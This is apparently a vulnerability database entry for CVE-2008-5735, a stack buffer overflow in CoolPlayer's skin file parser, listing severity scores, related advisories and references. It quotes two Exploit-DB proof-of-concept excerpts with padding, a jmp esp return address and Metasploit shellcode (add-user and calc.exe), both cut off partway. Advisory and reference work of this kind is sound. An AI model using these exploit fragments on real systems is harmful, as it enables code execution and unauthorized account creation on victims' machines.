CVE-2008-5735
Published 2008-12-26
Priority P350 · critical · 9.3 CVSS 2.0
AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS 7.39% · 93.7th percentile
Stack-based buffer overflow in skin.c in CoolPlayer 2.17 through 2.19 allows remote attackers to execute arbitrary code via a large PlaylistSkin value in a skin file.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coolplayer | coolplayer | — | — |
| coolplayer | coolplayer | — | — |
| coolplayer | coolplayer | — | — |
| coolplayer | coolplayer | — | — |
GHSA
GHSA-rqm3-w6pg-frpw: Stack-based buffer overflow in skin
ghsa_unreviewed·2022-05-14
CVE-2008-5735 [HIGH] CWE-119 GHSA-rqm3-w6pg-frpw: Stack-based buffer overflow in skin
Stack-based buffer overflow in skin.c in CoolPlayer 2.17 through 2.19 allows remote attackers to execute arbitrary code via a large PlaylistSkin value in a skin file.
GHSA
GHSA-mxhx-hq56-f376: Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2
ghsa_unreviewed·2022-05-02·CVSS 9.3
CVE-2009-1449 [CRITICAL] CWE-119 GHSA-mxhx-hq56-f376: Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2
Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2.19.1 allows remote attackers to execute arbitrary code via a skin file (skin.ini) with a large PlaylistSkin parameter. NOTE: this may overlap CVE-2008-5735.
No detection rules found.
Exploit-DB
CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
exploitdb·2008-12-22
CVE-2008-5735 CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
---
# CoolPlayer (Skin) Buffer Overflow
# maybe all versions are affected :)
# By:Encrypt3d.M!nd
#
# Original Exploit: by r0ut3r
# http://www.milw0rm.com/exploits/7536
#
# I've tested it on my box (winxp sp3) and it didn't work
# so I've rewritten the exploit and this is working
# tested: Windows xp sp3 patched
# version tested:2.17,2.18,2.19
#
# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends
###################################################
chars = "A"*1511
eip = "\x6B\x8C\x49\x7E" #user32.dll jmp esp
header = "[CoolPlayer Skin]\nPlaylistSkin="
# win32_adduser - PASS=t35t EXITFUNC=seh USER=t35t Size=489 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x
Exploit-DB
CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
exploitdb·2008-12-21
CVE-2008-5735 CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
---
/*
* CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit
*
* Advisory: http://www.bmgsec.com.au/advisory/43/
* Test box: WinXP Pro SP2 English
*
* Code reference is in skin.c, lines 464 - 480
*
* Written and discovered by:
* r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
*/
#include
#include
#include //exit
using namespace std;
int main()
{
//win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
//Bad characters: 0x00, 0x0d, 0xf4
char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x
No writeups or analysis indexed.
http://securityreason.com/securityalert/4813
http://www.bmgsec.com.au/advisory/43/
http://www.securityfocus.com/archive/1/499480/100/0/threaded
http://www.securityfocus.com/bid/32947
https://exchange.xforce.ibmcloud.com/vulnerabilities/47527
https://www.exploit-db.com/exploits/7536
https://www.exploit-db.com/exploits/7547